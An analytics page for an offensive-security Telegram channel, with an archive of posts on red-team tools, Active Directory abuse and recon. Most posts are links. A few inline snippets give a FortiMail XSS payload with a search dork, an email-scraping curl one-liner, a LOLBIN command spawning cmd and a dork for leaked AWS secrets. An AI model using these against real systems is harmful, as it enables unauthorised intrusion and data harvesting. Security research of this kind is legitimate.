ru
Feedback
APT

APT

Открыть в Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Больше
Россия45 631Технологии и приложения8 841

📈 Аналитический обзор Telegram-канала APT

Канал APT (@apt_notes) языкового сегмента Английский является активным участником. Сейчас сообщество объединяет 14 674 подписчиков, занимая 8 841 место в категории Технологии и приложения и 45 631 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 674 подписчиков.

Согласно последним данным от 12 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 406, а за последние 24 часа — 7, при этом общий охват остаётся высоким.

  • Статус верификации: Не верифицирован
  • Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 49.89%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
  • Охват публикаций: В среднем каждый пост получает 7 313 просмотров. В течение первых суток публикация набирает 0 просмотров.
  • Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 20.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Благодаря высокой частоте обновлений (последние данные получены 13 июня, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

14 674
Подписчики
+724 часа
+1007 дней
+40630 день
Архив постов
APT
APT
14 674
Repost from PT SWARM
✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.
✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.

APT
APT
14 674
OSINT Tip Quickly scrape email addresses from a site with this simple curl command cat targets.txt | xargs -n1 -I{} curl -s https://{} | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort -u #osint #tip #curl #email #recon

APT
APT
14 674
Relaying Kerberos over DNS using krbrelayx and mitm6 New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services. https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/ #ad #kerberos #relay #mitm6

APT
APT
14 674
KnockOutlook KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements. https://github.com/eksperience/KnockOutlook #exchange #outlook #com #recon

APT
APT
14 674
Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062) An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. PoC: https://example/fmlurlsvc/?=&url=https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E Payload: https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E Dork: inurl:/fmlurlsvc/ #fortinet #forimail #xss

APT
APT
14 674
Container Security Checklist Checklist for container security devsecops practices https://github.com/krol3/container-security-checklist #kubernetes #docker #security #cheatsheet #blueteam

APT
APT
14 674
PowerRunAsSystem Run application as system with interactive system process support (active Windows session). This technique doesn't rely on any external tools and doesn't require a Microsoft Service. It spawns an NT Authority/System process using the Microsoft Windows Task Scheduler then upgrade to Interactive System Process using cool WinApi's (Run in Active Windows Session) https://github.com/DarkCoderSc/PowerRunAsSystem #windows #powershell #runas

APT
APT
14 674
Bloodhound Custom Queries A combination of custom cypher queries from various sources for BloodHound, added categories to match newest version of BH. https://github.com/ZephrFish/Bloodhound-CustomQueries #ad #azure #bloodhound #queries

APT
APT
14 674
Google Groups Dork Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive informati
Google Groups Dork Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc . Dork: site:http://groups.google.com "COMPANY" #osint #dorks #bugbounty

APT
APT
14 674
Bypass 2FA Using noVNC Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client
Bypass 2FA Using noVNC Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client that has a browser running in kiosk mode. https://mrd0x.com/bypass-2fa-using-novnc/ #2fa #bypass #novnc

APT
APT
14 674
DNS Abuse & Misconfiguration The History of DNS Vulnerabilities and the Cloud https://unit42.paloaltonetworks.com/dns-vulnerabilities/ Dangling Domains: Security Threats, Detection and Prevalence https://unit42.paloaltonetworks.com/dangling-domains/ Fishing the AWS IP Pool for Dangling Domains https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/ The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability in AWS, Google Cloud, Rackspace and Digital Ocean https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/ The .io Error – Taking Control of All .io Domains With a Targeted Registration https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/ The International Incident – Gaining Control of a .int Domain Name With DNS Trickery https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/ Hostile Subdomain Takeover using Heroku/Github/Desk + more https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/ Dangling DNS: Amazon EC2 IPs https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state Eliminating Dangling Elastic IP Takeovers with Ghostbuster https://blog.assetnote.io/2022/02/13/dangling-eips/ Internet-Wide Analysis of Subdomain Takeovers https://redhuntlabs.com/blog/project-resonance-wave-1.html Subdomain Takeover https://0xpatrik.com/subdomain-takeover-basics/ https://0xpatrik.com/subdomain-takeover-candidates/ https://0xpatrik.com/takeover-proofs/ https://0xpatrik.com/subdomain-takeover-ns/ https://0xpatrik.com/subdomain-takeover/ #dns #abuse #aws #elastic #subdomain #takeover

APT
APT
14 674
Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! Blog: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6 Tool: https://github.com/ly4k/Certipy #ad #adcs #abuse #tools

APT
APT
14 674
LOLBIN — wlrmdr Action on click: wlrmdr.exe -s 60000 -f 1 -t "Important" -m "Click this dude!" -a 10 -u cmd You can use "-a 1
+1
LOLBIN — wlrmdr Action on click: wlrmdr.exe -s 60000 -f 1 -t "Important" -m "Click this dude!" -a 10 -u cmd You can use "-a 11" to skip the click requirement and spawn your process immediately: wlrmdr -s 0 -f 0 -t 0 -m 0 -a 11 -u cmd #windows #wlrmdr #lolbin #lolbas

APT
APT
14 674
DumpSMBShare A script to dump files and folders remotely from a Windows SMB share. https://github.com/p0dalirius/DumpSMBShare
DumpSMBShare A script to dump files and folders remotely from a Windows SMB share. https://github.com/p0dalirius/DumpSMBShare #ad #smb #share #dump

APT
APT
14 674
Keeping Up with the NTLM Relay https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay #ad #ntlm #relay #adcs

APT
APT
14 674
o365recon Script to retrieve information via O365 and AzureAD with a valid cred. https://github.com/nyxgeek/o365recon #azure
o365recon Script to retrieve information via O365 and AzureAD with a valid cred. https://github.com/nyxgeek/o365recon #azure #recon #tools

APT
APT
14 674
Zabbix SAML Authentication Bypass (CVE-2022-23131) https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage #zabbix #research #auth #bypass #cve

APT
APT
14 674
S3Scanner Scan for open S3 buckets and dump the contents Features: — Multi-threaded scanning — Supports tons of S3-compatible
S3Scanner Scan for open S3 buckets and dump the contents Features: — Multi-threaded scanning — Supports tons of S3-compatible APIs — Scans all bucket permissions to find misconfigurations — Dump bucket contents to a local folder — Docker support https://github.com/sa7mon/S3Scanner #aws #s3 #bucket #scanner

APT
APT
14 674
Recon — Horizontal Enumeration https://aaryanapex.medium.com/bug-bounty-methodology-horizontal-enumeration-89f7cd172e6e #osint #recon #enumeration

APT
APT
14 674
Useful Libraries for Malware Development https://captmeelo.com/redteam/maldev/2022/02/16/libraries-for-maldev.html #edr #evasion #lib #maldev #cpp